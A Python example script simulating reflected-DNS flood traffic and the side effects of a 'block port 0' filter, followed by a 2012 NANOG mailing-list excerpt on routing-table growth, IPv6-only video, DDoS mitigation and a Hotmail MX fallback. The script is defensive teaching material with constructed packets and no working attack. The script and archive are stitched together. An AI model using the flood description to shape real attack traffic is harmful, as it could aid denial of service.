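"""Why a flow tool reports "port 0", and what a "block port 0" rule would catch.

Added example for the port 0 / port 53 DDoS thread; not code from any
participant. All packet records are constructed, with RFC 5737 addresses.
"""
from collections import Counter
from dataclasses import dataclass
import ipaddress

VICTIM = "203.0.113.10"     # constructed: the customer address under attack
RESOLVER = "203.0.113.53"   # constructed: the site's own recursive resolver


@dataclass(frozen=True)
class Packet:
    proto: int          # IP protocol number (6 = TCP, 17 = UDP, 47 = GRE)
    src: str
    dst: str
    sport: int          # 0 when the packet carries no layer-4 header
    dport: int
    frag_offset: int    # fragment offset in 8-byte units; > 0 = non-initial fragment
    mf: bool            # "more fragments" flag
    length: int         # bytes on the wire


def flow_ports(pkt):
    """Port pair a NetFlow-style exporter records for this packet.

    Only the first fragment of a datagram carries the UDP/TCP header, so every
    non-initial fragment is exported as 0/0. Protocols without ports (ICMP, GRE,
    IP-in-IP) look the same. "Port 0" in a flow report is usually not a port.
    """
    if pkt.proto not in (6, 17) or pkt.frag_offset > 0:
        return (0, 0)
    return (pkt.sport, pkt.dport)


def share_by_source_port(pkts):
    """Percent of bytes per exported source port. A reflected DNS answer has
    source port 53; its trailing fragments are exported with source port 0."""
    total = sum(p.length for p in pkts)
    by_port = Counter()
    for p in pkts:
        by_port[flow_ports(p)[0]] += p.length
    return {port: round(100 * n / total) for port, n in by_port.items()}


def simulate_port0_block(pkts, prefix, victim):
    """Apply an upstream rule "drop tcp/udp to <prefix> with dst port 0".

    Returns (dropped, collateral). Collateral is everything dropped that was not
    aimed at the victim: legitimate fragments such as large EDNS/DNSSEC answers
    on their way to the site's own resolver, which look identical on the wire.
    """
    net = ipaddress.ip_network(prefix)
    dropped = [p for p in pkts
               if p.proto in (6, 17)
               and flow_ports(p)[1] == 0
               and ipaddress.ip_address(p.dst) in net]
    collateral = [p for p in dropped if p.dst != victim]
    return dropped, collateral


def build_sample():
    """Constructed traffic mix: a reflected-DNS flood plus normal background."""
    pkts = []
    # Eight open resolvers each return a 2500-byte answer to the victim: a
    # 1500-byte first fragment (UDP 53 -> ephemeral) and a 1020-byte tail.
    for i in range(8):
        reflector = f"198.51.100.{i + 1}"
        pkts.append(Packet(17, reflector, VICTIM, 53, 40000 + i, 0, True, 1500))
        pkts.append(Packet(17, reflector, VICTIM, 0, 0, 185, False, 1020))
    # Legitimate fragmented DNSSEC answer from an authoritative server to the
    # site's recursive resolver: same shape on the wire as the attack tail.
    pkts.append(Packet(17, "192.0.2.53", RESOLVER, 53, 50000, 0, True, 1500))
    pkts.append(Packet(17, "192.0.2.53", RESOLVER, 0, 0, 185, False, 300))
    # A GRE tunnel packet and an ordinary web request, for contrast.
    pkts.append(Packet(47, "192.0.2.1", "203.0.113.20", 0, 0, 0, False, 120))
    pkts.append(Packet(6, "192.0.2.7", "203.0.113.80", 51000, 80, 0, False, 600))
    return pkts


if __name__ == "__main__":
    sample = build_sample()
    print("byte share by exported source port:", share_by_source_port(sample))
    dropped, collateral = simulate_port0_block(sample, "203.0.113.0/24", VICTIM)
    print(f"port-0 rule drops {len(dropped)} packets, {len(collateral)} collateral:")
    for p in collateral:
        print("  ", p.src, "->", p.dst, "non-initial UDP fragment")
```

The GRE packet is exported as port 0 too but is untouched by a tcp/udp rule, while the resolver's DNSSEC tail fragment is dropped; that is the trade-off the thread describes.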
From gih at apnic.net Wed Jul 25 21:16:50 2012
From: gih at apnic.net (Geoff Huston)
Date: Thu, 26 Jul 2012 12:16:50 +1000
Subject: Weekly Routing Table Report
In-Reply-To: <451C7E1E-7F98-44FD-8EB4-7F3F118E3261@puck.nether.net>
References: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net> <36781.1342814676@turing-police.cc.vt.edu> <716F2E24-2A9C-411C-97D8-59C25003FB7A@spawar.navy.mil> <451C7E1E-7F98-44FD-8EB4-7F3F118E3261@puck.nether.net>
Message-ID:

On 21/07/2012, at 6:40 AM, Jared Mauch wrote:

>
> On Jul 20, 2012, at 4:30 PM, Ron Broersma wrote:
>
>>
>> On Jul 20, 2012, at 1:04 PM, valdis.kletnieks at vt.edu wrote:
>>> On Sat, 21 Jul 2012 05:10:41 +1000, Routing Analysis Role Account said:
>>>> BGP routing table entries examined: 418048
>>> So, whatever happened to that whole "the internet will catch fire when we get to 280K routing table entries" or whatever it was? :)
>>
>> We added memory where we could, or bought bigger routers. The new (conventional wisdom) limit is 1M routes.
>
> I think you mean 512k IPv4 with 256k of IPv6 (taking double space).

512K of IPv4? That's getting close!

Geoff

From Tina.Tsou.Zouting at huawei.com Wed Jul 25 22:25:38 2012
From: Tina.Tsou.Zouting at huawei.com (Tina TSOU)
Date: Thu, 26 Jul 2012 03:25:38 +0000
Subject: IPv6 only streaming video
In-Reply-To:
References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net>
Message-ID: <6FA3E5FF-AC62-432D-95B7-7A4E57A879DC@huawei.com>

Dear Randy,
I'm responsible for IPv6 deployment in my enterprise network; the users are my colleagues. In this context, I'm not a vendor, not an operator.

Tina

On Jul 25, 2012, at 5:20 PM, "Randy Bush" wrote:

>> My enterprise users
>
> it is generally best if vendors do not speak for users and vice versa
>
> randy

From joelja at bogus.com Wed Jul 25 22:47:44 2012
From: joelja at bogus.com (Joel jaeggli)
Date: Wed, 25 Jul 2012 20:47:44 -0700
Subject: IPv6 only streaming video
In-Reply-To:
References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net>
Message-ID: <5010BDE0.8070406@bogus.com>

On 7/25/12 13:15 , Tina TSOU wrote:
> Dear all,
> If you know there is any testing or commercial IPv6 only streaming video we can access, let me know.
> Thank you.

speaking as a content provider, ipv6-only service requests are misguided.

> Tina
>
>
>> -----Original Message-----
>> From: Arturo Servin [mailto:aservin at lacnic.net]
>> Sent: Wednesday, July 25, 2012 12:14 PM
>> To: Tina TSOU
>> Cc: nanog at nanog.org
>> Subject: Re: IPv6 only streaming video
>>
>>
>> The licence expired.
>>
>> We will see if we can get another one.
>>
>> Cheers,
>> as
>>
>> On 25 Jul 2012, at 15:58, Arturo Servin wrote:
>>
>>>
>>> Oh!
>>>
>>> We had it as a test service. We didn't know that it was being used by more people, so probably somebody turned it off.
>>>
>>> I will look around to restart it.
>>>
>>> Thanks!
>>> as
>>>
>>> On 25 Jul 2012, at 15:37, Tina TSOU wrote:
>>>
>>>> We got offline after discussion in NANOG in May. This IPv6 only streaming video worked well until recently. We use it in my enterprise network.
>>>> I just could not find his contact in my mailbox. So I hope he can find me again.
>>>> Is the link accessible from your IPv6 host?
>>>>
>>>> Tina
>>>> @ 2001:db8:1:ffff:e8e2:7822:9d12:e12e
>>>>
>>>>> -----Original Message-----
>>>>> From: christopher.morrow at gmail.com [mailto:christopher.morrow at gmail.com]
>>>>> On Behalf Of Christopher Morrow
>>>>> Sent: Wednesday, July 25, 2012 11:27 AM
>>>>> To: Tina TSOU
>>>>> Cc: nanog at nanog.org
>>>>> Subject: Re: IPv6 only streaming video
>>>>>
>>>>> On Wed, Jul 25, 2012 at 1:11 PM, Tina TSOU wrote:
>>>>>> http://video.v6.labs.lacnic.net/jw/
>>>>>> Server can not be found since yesterday. Has the URL been changed?
>>>>>
>>>>> did you mean to email the lacnic folks?
>>>
>
>

From rdobbins at arbor.net Wed Jul 25 23:03:01 2012
From: rdobbins at arbor.net (Dobbins, Roland)
Date: Thu, 26 Jul 2012 04:03:01 +0000
Subject: DDoS using port 0 and 53 (DNS)
In-Reply-To:
References: <003101cd6a17$3f81ddc0$be859940$@iname.com>
Message-ID:

On Jul 26, 2012, at 5:13 AM, Drew Weaver wrote:

> Another nice "emerging" tool [I say emerging because it's been around forever but nobody implements it] to deal with this is Flowspec, using flowspec you can instruct your Upstream to block traffic with much more granular characteristics.

flowspec is essentially S/RTBH with layer-4 granularity (it can do some other things, as well). I certainly hope that vendors who've not yet implemented it will do so; it's a great tool, as you say.

Even customer-triggered S/RTBH is very useful, and some ISPs have implemented it for their customers.

-----------------------------------------------------------------------
Roland Dobbins // 

Luck is the residue of opportunity and design.

-- John Milton

From rdobbins at arbor.net Wed Jul 25 23:19:27 2012
From: rdobbins at arbor.net (Dobbins, Roland)
Date: Thu, 26 Jul 2012 04:19:27 +0000
Subject: Another LTE network turns up as IPv4-only squat space + NAT
In-Reply-To: <20120719085002.GI20473@besserwisser.org>
References: <009801cd6557$503c6d70$f0b54850$@gmail.com> <20120719085002.GI20473@besserwisser.org>
Message-ID: <9D5876CA-0D09-43A5-B105-6EB5DCFDEBF5@arbor.net>

On Jul 19, 2012, at 3:50 PM, Måns Nilsson wrote:

> No, reusing somebody's prefix is A Very Bad Idea.

Concur 100%. There is no security value to doing this whatsoever - quite the opposite, given the possible negative consequences to reachability and, thus, availability.

-----------------------------------------------------------------------
Roland Dobbins // 

Luck is the residue of opportunity and design.

-- John Milton

From Tina.Tsou.Zouting at huawei.com Wed Jul 25 23:43:20 2012
From: Tina.Tsou.Zouting at huawei.com (Tina TSOU)
Date: Thu, 26 Jul 2012 04:43:20 +0000
Subject: IPv6 only streaming video
In-Reply-To: <5010BDE0.8070406@bogus.com>
References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> <5010BDE0.8070406@bogus.com>
Message-ID: <7D1D6098-54C4-43B5-83DE-6BF7D04FBF09@huawei.com>

Dear Joel,
Who requests IPv6 only service?

Tina

On Jul 25, 2012, at 8:48 PM, "Joel jaeggli" wrote:

> On 7/25/12 13:15 , Tina TSOU wrote:
>> Dear all,
>> If you know there is any testing or commercial IPv6 only streaming video we can access, let me know.
>> Thank you.
>
> speaking as a content provider, ipv6-only service requests are misguided.
>
>> Tina
>>
>>
>>> -----Original Message-----
>>> From: Arturo Servin [mailto:aservin at lacnic.net]
>>> Sent: Wednesday, July 25, 2012 12:14 PM
>>> To: Tina TSOU
>>> Cc: nanog at nanog.org
>>> Subject: Re: IPv6 only streaming video
>>>
>>>
>>> The licence expired.
>>>
>>> We will see if we can get another one.
>>>
>>> Cheers,
>>> as
>>>
>>> On 25 Jul 2012, at 15:58, Arturo Servin wrote:
>>>
>>>>
>>>> Oh!
>>>>
>>>> We had it as a test service. We didn't know that it was being used by more people, so probably somebody turned it off.
>>>>
>>>> I will look around to restart it.
>>>>
>>>> Thanks!
>>>> as
>>>>
>>>> On 25 Jul 2012, at 15:37, Tina TSOU wrote:
>>>>
>>>>> We got offline after discussion in NANOG in May. This IPv6 only streaming video worked well until recently. We use it in my enterprise network.
>>>>> I just could not find his contact in my mailbox. So I hope he can find me again.
>>>>> Is the link accessible from your IPv6 host?
>>>>>
>>>>> Tina
>>>>> @ 2001:db8:1:ffff:e8e2:7822:9d12:e12e
>>>>>
>>>>>> -----Original Message-----
>>>>>> From: christopher.morrow at gmail.com [mailto:christopher.morrow at gmail.com]
>>>>>> On Behalf Of Christopher Morrow
>>>>>> Sent: Wednesday, July 25, 2012 11:27 AM
>>>>>> To: Tina TSOU
>>>>>> Cc: nanog at nanog.org
>>>>>> Subject: Re: IPv6 only streaming video
>>>>>>
>>>>>> On Wed, Jul 25, 2012 at 1:11 PM, Tina TSOU wrote:
>>>>>>> http://video.v6.labs.lacnic.net/jw/
>>>>>>> Server can not be found since yesterday. Has the URL been changed?
>>>>>>
>>>>>> did you mean to email the lacnic folks?
>>>>
>>
>>
>>
>

From randy at psg.com Wed Jul 25 23:47:03 2012
From: randy at psg.com (Randy Bush)
Date: Wed, 25 Jul 2012 21:47:03 -0700
Subject: IPv6 only streaming video
In-Reply-To: <6FA3E5FF-AC62-432D-95B7-7A4E57A879DC@huawei.com>
References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net>
Message-ID:

> I'm responsible for IPv6 deployment in my enterprise network, the
> users are my colleagues. In this context, I'm not vendor, not
> operator.

i smell cows

From joelja at bogus.com Wed Jul 25 23:48:10 2012
From: joelja at bogus.com (Joel jaeggli)
Date: Wed, 25 Jul 2012 21:48:10 -0700
Subject: IPv6 only streaming video
In-Reply-To: <7D1D6098-54C4-43B5-83DE-6BF7D04FBF09@huawei.com>
References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> <5010BDE0.8070406@bogus.com> <7D1D6098-54C4-43B5-83DE-6BF7D04FBF09@huawei.com>
Message-ID: <5010CC0A.6050604@bogus.com>

On 7/25/12 21:43 , Tina TSOU wrote:
> Dear Joel,
> Who requests IPv6 only service?

you did... check the title of this thread.

> Tina
>
> On Jul 25, 2012, at 8:48 PM, "Joel jaeggli" wrote:
>
>> On 7/25/12 13:15 , Tina TSOU wrote:
>>> Dear all,
>>> If you know there is any testing or commercial IPv6 only streaming video we can access, let me know.
>>> Thank you.
>>
>> speaking as a content provider, ipv6-only service requests are misguided.
>>
>>> Tina
>>>
>>>
>>>> -----Original Message-----
>>>> From: Arturo Servin [mailto:aservin at lacnic.net]
>>>> Sent: Wednesday, July 25, 2012 12:14 PM
>>>> To: Tina TSOU
>>>> Cc: nanog at nanog.org
>>>> Subject: Re: IPv6 only streaming video
>>>>
>>>>
>>>> The licence expired.
>>>>
>>>> We will see if we can get another one.
>>>>
>>>> Cheers,
>>>> as
>>>>
>>>> On 25 Jul 2012, at 15:58, Arturo Servin wrote:
>>>>
>>>>>
>>>>> Oh!
>>>>>
>>>>> We had it as a test service. We didn't know that it was being used by more people, so probably somebody turned it off.
>>>>>
>>>>> I will look around to restart it.
>>>>>
>>>>> Thanks!
>>>>> as
>>>>>
>>>>> On 25 Jul 2012, at 15:37, Tina TSOU wrote:
>>>>>
>>>>>> We got offline after discussion in NANOG in May. This IPv6 only streaming video worked well until recently. We use it in my enterprise network.
>>>>>> I just could not find his contact in my mailbox. So I hope he can find me again.
>>>>>> Is the link accessible from your IPv6 host?
>>>>>>
>>>>>> Tina
>>>>>> @ 2001:db8:1:ffff:e8e2:7822:9d12:e12e
>>>>>>
>>>>>>> -----Original Message-----
>>>>>>> From: christopher.morrow at gmail.com [mailto:christopher.morrow at gmail.com]
>>>>>>> On Behalf Of Christopher Morrow
>>>>>>> Sent: Wednesday, July 25, 2012 11:27 AM
>>>>>>> To: Tina TSOU
>>>>>>> Cc: nanog at nanog.org
>>>>>>> Subject: Re: IPv6 only streaming video
>>>>>>>
>>>>>>> On Wed, Jul 25, 2012 at 1:11 PM, Tina TSOU wrote:
>>>>>>>> http://video.v6.labs.lacnic.net/jw/
>>>>>>>> Server can not be found since yesterday. Has the URL been changed?
>>>>>>>
>>>>>>> did you mean to email the lacnic folks?
>>>>>
>>>
>>>
>>>
>>
>

From Tina.Tsou.Zouting at huawei.com Wed Jul 25 23:48:48 2012
From: Tina.Tsou.Zouting at huawei.com (Tina TSOU)
Date: Thu, 26 Jul 2012 04:48:48 +0000
Subject: IPv6 only streaming video
In-Reply-To:
References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net>
Message-ID: <1FE43E65-A102-4C2B-9B19-C7433A0CD309@huawei.com>

Do you mean I am a cow? I stopped breastfeeding this year.

Tina

On Jul 25, 2012, at 9:47 PM, "Randy Bush" wrote:

>> I'm responsible for IPv6 deployment in my enterprise network, the
>> users are my colleagues. In this context, I'm not vendor, not
>> operator.
>
> i smell cows

From Tina.Tsou.Zouting at huawei.com Wed Jul 25 23:59:40 2012
From: Tina.Tsou.Zouting at huawei.com (Tina TSOU)
Date: Thu, 26 Jul 2012 04:59:40 +0000
Subject: IPv6 only streaming video
In-Reply-To: <5010CC0A.6050604@bogus.com>
References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> <5010BDE0.8070406@bogus.com> <7D1D6098-54C4-43B5-83DE-6BF7D04FBF09@huawei.com> <5010CC0A.6050604@bogus.com>
Message-ID:

Oh, I did not, because we have been using http://video.v6.labs.lacnic.net/jw/, and it stopped working recently, and I could not find the contact any more, so I came back to the NANOG list, where we were connected.

Tina

On Jul 25, 2012, at 9:48 PM, "Joel jaeggli" wrote:

> On 7/25/12 21:43 , Tina TSOU wrote:
>> Dear Joel,
>> Who requests IPv6 only service?
>
> you did... check the title of this thread.
>
>> Tina
>>
>> On Jul 25, 2012, at 8:48 PM, "Joel jaeggli" wrote:
>>
>>> On 7/25/12 13:15 , Tina TSOU wrote:
>>>> Dear all,
>>>> If you know there is any testing or commercial IPv6 only streaming video we can access, let me know.
>>>> Thank you.
>>>
>>> speaking as a content provider, ipv6-only service requests are misguided.
>>>
>>>> Tina
>>>>
>>>>> -----Original Message-----
>>>>> From: Arturo Servin [mailto:aservin at lacnic.net]
>>>>> Sent: Wednesday, July 25, 2012 12:14 PM
>>>>> To: Tina TSOU
>>>>> Cc: nanog at nanog.org
>>>>> Subject: Re: IPv6 only streaming video
>>>>>
>>>>> The licence expired.
>>>>>
>>>>> We will see if we can get another one.
>>>>>
>>>>> Cheers,
>>>>> as
>>>>>
>>>>> On 25 Jul 2012, at 15:58, Arturo Servin wrote:
>>>>>
>>>>>> Oh!
>>>>>>
>>>>>> We had it as a test service. We didn't know that it was being used by more people, so probably somebody turned it off.
>>>>>>
>>>>>> I will look around to restart it.
>>>>>>
>>>>>> Thanks!
>>>>>> as
>>>>>>
>>>>>> On 25 Jul 2012, at 15:37, Tina TSOU wrote:
>>>>>>
>>>>>>> We got offline after discussion in NANOG in May. This IPv6 only streaming video worked well until recently. We use it in my enterprise network.
>>>>>>> I just could not find his contact in my mailbox. So I hope he can find me again.
>>>>>>> Is the link accessible from your IPv6 host?
>>>>>>>
>>>>>>> Tina
>>>>>>> @ 2001:db8:1:ffff:e8e2:7822:9d12:e12e
>>>>>>>
>>>>>>>> -----Original Message-----
>>>>>>>> From: christopher.morrow at gmail.com [mailto:christopher.morrow at gmail.com]
>>>>>>>> On Behalf Of Christopher Morrow
>>>>>>>> Sent: Wednesday, July 25, 2012 11:27 AM
>>>>>>>> To: Tina TSOU
>>>>>>>> Cc: nanog at nanog.org
>>>>>>>> Subject: Re: IPv6 only streaming video
>>>>>>>>
>>>>>>>> On Wed, Jul 25, 2012 at 1:11 PM, Tina TSOU wrote:
>>>>>>>>> http://video.v6.labs.lacnic.net/jw/
>>>>>>>>> Server can not be found since yesterday. Has the URL been changed?
>>>>>>>>
>>>>>>>> did you mean to email the lacnic folks?
From joelja at bogus.com Thu Jul 26 00:08:39 2012 From: joelja at bogus.com (Joel jaeggli) Date: Wed, 25 Jul 2012 22:08:39 -0700 Subject: IPv6 only streaming video In-Reply-To: References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> , <5010BDE0.8070406@bogus.com> <7D1D6098-54C4-43B5-83DE-6BF7D04FBF09@huawei.com>, <5010CC0A.6050604@bogus.com> Message-ID: <5010D0D7.5060907@bogus.com> On 7/25/12 21:59 , Tina TSOU wrote: > Oh I did not, because we have been > using http://video.v6.labs.lacnic.net/jw/, and it stopped working > recently, and I could not find the contact any more, so I came back to > NANOG list which we were connected. I think you'll find content providers have little interest in delivering v6 only service, the occasional noble test site notwithstanding. v6 enabled however is readily available. Joels-MacBook:~ jjaeggli$ host youtube.com youtube.com has address 74.125.225.40 youtube.com has address 74.125.225.35 youtube.com has address 74.125.225.34 youtube.com has address 74.125.225.39 youtube.com has address 74.125.225.41 youtube.com has address 74.125.225.33 youtube.com has address 74.125.225.37 youtube.com has address 74.125.225.32 youtube.com has address 74.125.225.36 youtube.com has address 74.125.225.46 youtube.com has address 74.125.225.38 youtube.com has IPv6 address 2001:4860:b007::5d > Tina > > On Jul 25, 2012, at 9:48 PM, "Joel jaeggli" > wrote: > >> On 7/25/12 21:43 , Tina TSOU wrote: >>> Dear Joel, >>> Who requests IPv6 only service? >> >> you did... check the title of this thread. >> >>> Tina >>> >>> On Jul 25, 2012, at 8:48 PM, "Joel jaeggli" >> > wrote: >>> >>>> On 7/25/12 13:15 , Tina TSOU wrote: >>>>> Dear all, >>>>> If you know there is any testing or commercial IPv6 only streaming >>>>> video we can access, let me know. >>>>> Thank you. >>>> >>>> speaking as a content provider, ipv6-only service requests are >>>> misguided. 
>>>> >>>>> Tina >>>>> >>>>> >>>>>> -----Original Message----- >>>>>> From: Arturo Servin [mailto:aservin at lacnic.net] >>>>>> Sent: Wednesday, July 25, 2012 12:14 PM >>>>>> To: Tina TSOU >>>>>> Cc: nanog at nanog.org >>>>>> Subject: Re: IPv6 only streaming video >>>>>> >>>>>> >>>>>> The licence expired. >>>>>> >>>>>> We will see if we can get another one. >>>>>> >>>>>> Cheers, >>>>>> as >>>>>> >>>>>> On 25 Jul 2012, at 15:58, Arturo Servin wrote: >>>>>> >>>>>>> >>>>>>> Oh! >>>>>>> >>>>>>> We had it as a test service. We didn't know that it was been used >>>>>> by more people, so probably somebody turn it off. >>>>>>> >>>>>>> I will look around to restart it. >>>>>>> >>>>>>> Thanks! >>>>>>> as >>>>>>> >>>>>>> On 25 Jul 2012, at 15:37, Tina TSOU wrote: >>>>>>> >>>>>>>> We got offline after discussion in NANOG in May. This IPv6 only >>>>>> streaming video worked well until recently. We use it in my enterprise >>>>>> network. >>>>>>>> I just could not find his contact in my mailbox. So I hope he can >>>>>> find me again. >>>>>>>> Does the link accessible from your IPv6 host? >>>>>>>> >>>>>>>> Tina >>>>>>>> @ 2001:db8:1:ffff:e8e2:7822:9d12:e12e >>>>>>>> >>>>>>>>> -----Original Message----- >>>>>>>>> From: christopher.morrow at gmail.com >>>>>>>>> >>>>>> [mailto:christopher.morrow at gmail.com] >>>>>>>>> On Behalf Of Christopher Morrow >>>>>>>>> Sent: Wednesday, July 25, 2012 11:27 AM >>>>>>>>> To: Tina TSOU >>>>>>>>> Cc: nanog at nanog.org >>>>>>>>> Subject: Re: IPv6 only streaming video >>>>>>>>> >>>>>>>>> On Wed, Jul 25, 2012 at 1:11 PM, Tina TSOU >>>>>>>>> >>>>>>>> > wrote: >>>>>>>>>> http://video.v6.labs.lacnic.net/jw/ >>>>>>>>>> Server can not be found since yesterday. Has the URL been changed? >>>>>>>>>> >>>>>>>>>> >>>>>>>>> >>>>>>>>> did you mean to email the lacnic folks? 
>>>>>>> >>>>> >>>>> >>>>> >>>> >>> >> From lou at metron.com Thu Jul 26 02:14:41 2012 From: lou at metron.com (Lou Katz) Date: Thu, 26 Jul 2012 00:14:41 -0700 Subject: Is Hotmail in the habit of ignoring MX records? Message-ID: <20120726071441.GA11199@metron.com> One of my users has reported incoming mail failures, which I finally tracked down. It turned out that Hotmail has seen fit to send the mail to his domain's A record machine, despite the fact that he has valid MX records. The A record points to my webserver, which does not normally accept mail for anyone. The mail server MX records are to an entirely different machine. Comments? Do I need more valium? -=[L]=- -- From ops.lists at gmail.com Thu Jul 26 02:21:49 2012 From: ops.lists at gmail.com (Suresh Ramasubramanian) Date: Thu, 26 Jul 2012 12:51:49 +0530 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: <20120726071441.GA11199@metron.com> References: <20120726071441.GA11199@metron.com> Message-ID: If the MX records are not responsive / timing out, they might be falling back to the A record. On Thu, Jul 26, 2012 at 12:44 PM, Lou Katz wrote: > One of my users has reported incoming mail failures, which I finally > tracked down. It turned out that Hotmail has seen fit to send the mail > to his domain's A record machine, despite the fact that he has valid MX > records. > > The A record points to my webserver, which does not normally accept mail > for anyone. The mail server MX records are to an entirely different > machine. > -- Suresh Ramasubramanian (ops.lists at gmail.com) From mysidia at gmail.com Thu Jul 26 02:38:31 2012 From: mysidia at gmail.com (Jimmy Hess) Date: Thu, 26 Jul 2012 02:38:31 -0500 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: <20120726071441.GA11199@metron.com> References: <20120726071441.GA11199@metron.com> Message-ID: On 7/26/12, Lou Katz wrote: > One of my users has reported incoming mail failures, which I finally > tracked down. 
It turned out that Hotmail has seen fit to send the mail > to his domain's A record machine, despite the fact that he has valid MX > records. You looked in the mail headers and saw hotmail's mail server do that, or the From address/return path just happens to be hotmail? I would ask for a specific example of a domain name in which that seems to happen, and exact DNS zone contents. I am sure that Hotmail does not ignore MX in general, unless they just broke something; many domains require MX processing and A record to properly be ignored for mail to be accepted. But there may be something else going on with a specific domain or DNS queries/responses from its nameservers, that results in MX being ignored or unavailable, resulting in a fallback to 'lookup A'. An example could be some dns issue such as slow response to MX query, 'MX to a CNAME', 'MX to an invalid label that looks like an IP', MX DNS response packet too large, .... -- -JH From lou at metron.com Thu Jul 26 03:35:35 2012 From: lou at metron.com (Lou Katz) Date: Thu, 26 Jul 2012 01:35:35 -0700 Subject: Is Hotmail in the habit of ignoring MX records? In-Reply-To: References: <20120726071441.GA11199@metron.com> Message-ID: <20120726083535.GA13414@metron.com> On Thu, Jul 26, 2012 at 02:38:31AM -0500, Jimmy Hess wrote: > On 7/26/12, Lou Katz wrote: > > One of my users has reported incoming mail failures, which I finally > > tracked down. It turned out that Hotmail has seen fit to send the mail > > to his domain's A record machine, despite the fact that he has valid MX > > records. > > You looked in the mail headers and saw hotmail's mail server do that, > or the From address/return path just happens to be hotmail? > I would ask for a specific example of a domain name in which that > seems to happen, and exact DNS zone contents. 
>
> I am sure that Hotmail does not ignore MX in general, unless they
> just broke something; many domains require MX processing and A record
> to properly be ignored for mail to be accepted. But there may be
> something else going on with a specific domain or DNS
> queries/responses from its nameservers, that results in MX being
> ignored or unavailable, resulting in a fallback to 'lookup A'.
>
> An example could be some dns issue such as slow response to MX query,
> 'MX to a CNAME', 'MX to an invalid label that looks like an IP', MX
> DNS response packet too large,
> ....
>
>
> --
> -JH

Unfortunately, all I get from my user is a snippet, and it took me a while to realize that I had to look at the mail logs of my web server, not my mail server, to find the transaction.

The domain is cookephoto.com - and here is my zone file:

plaid# dig cookephoto.com any

; <<>> DiG 9.3.3 <<>> cookephoto.com any
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 55698
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 8, AUTHORITY: 0, ADDITIONAL: 8

;; QUESTION SECTION:
;cookephoto.com. IN ANY

;; ANSWER SECTION:
cookephoto.com. 172800 IN SOA ns.metron.com. hostmeister.metron.com. 2012011900 21600 3600 345600 345600
cookephoto.com. 172800 IN NS ns2.metron.com.
cookephoto.com. 172800 IN NS ns1.metron.com.
cookephoto.com. 172800 IN NS ns3.metron.com.
cookephoto.com. 172800 IN MX 12 mail2.metron.com.
cookephoto.com. 172800 IN MX 15 mail.katz.com.
cookephoto.com. 172800 IN MX 10 mail.metron.com.
cookephoto.com. 172800 IN A 192.160.193.89

;; ADDITIONAL SECTION:
ns1.metron.com. 3600 IN A 192.160.193.34
ns2.metron.com. 3600 IN A 209.204.189.89
ns2.metron.com. 3600 IN AAAA 2001:470:838d::89
ns3.metron.com. 3600 IN A 192.160.193.55
ns3.metron.com. 3600 IN AAAA 2001:470:838d::55
mail.metron.com. 3600 IN A 192.160.193.14
mail2.metron.com. 3600 IN A 209.204.189.91
mail.katz.com. 28800 IN A 192.160.193.14

and here is the maillog for the transaction, slightly redacted:

Jul 25 13:13:07 plaid sm-mta[5121]: NOQUEUE: connect from blu0-omc2-s2.blu0.hotmail.com [65.55.111.77]
Jul 25 13:13:07 plaid sm-mta[5121]: q6PKD7bH005121: --- 220 plaid.metron.com ESMTP Sendmail 8.13.8/8.13.8; Wed, 25 Jul 2012 13:13:07 -0700 (PDT)
Jul 25 13:13:07 plaid sm-mta[5121]: q6PKD7bH005121: <-- EHLO blu0-omc2-s2.blu0.hotmail.com
Jul 25 13:13:07 plaid sm-mta[5121]: q6PKD7bH005121: --- 250-plaid.metron.com Hello blu0-omc2-s2.blu0.hotmail.com [65.55.111.77], pleased to meet you
Jul 25 13:13:07 plaid sm-mta[5121]: q6PKD7bH005121: <-- MAIL FROM:
Jul 25 13:13:07 plaid sm-mta[5121]: q6PKD7bH005121: --- 250 2.1.0 ... Sender ok
Jul 25 13:13:08 plaid sm-mta[5121]: q6PKD7bH005121: <-- RCPT TO:
Jul 25 13:13:08 plaid sm-mta[5121]: q6PKD7bH005121: --- 550 5.7.1 ... Relaying denied
Jul 25 13:13:08 plaid sm-mta[5121]: q6PKD7bH005121: ruleset=check_rcpt, arg1=, relay=blu0-omc2-s2.blu0.hotmail.com [65.55.111.77], reject=550 5.7.1 ... Relaying denied
Jul 25 13:13:08 plaid sm-mta[5121]: q6PKD7bH005121: <-- RSET
Jul 25 13:13:08 plaid sm-mta[5121]: q6PKD7bH005121: --- 250 2.0.0 Reset state
Jul 25 13:13:08 plaid sm-mta[5121]: q6PKD7bH005121: from=, size=0, class=0, nrcpts=0, proto=ESMTP, daemon=IPv4, relay=blu0-omc2-s2.blu0.hotmail.com [65.55.111.77]
Jul 25 13:13:08 plaid sm-mta[5121]: q6PKD7bI005121: <-- QUIT
Jul 25 13:13:08 plaid sm-mta[5121]: q6PKD7bI005121: --- 221 2.0.0 plaid.metron.com closing connection

The 5.7.1 relaying denied is correct, since the webserver does not accept mail for the website domains.

At the time of the transaction, nothing special was happening here, and other mail was flowing quite nicely into the mail server. Other Hotmail servers were sending to other recipients here through the regular mailserver OK.

Thanks for looking at it.
-=[L]=-

From blakjak at blakjak.net Thu Jul 26 05:32:05 2012
From: blakjak at blakjak.net (Mark Foster)
Date: Thu, 26 Jul 2012 22:32:05 +1200
Subject: Is Hotmail in the habit of ignoring MX records?
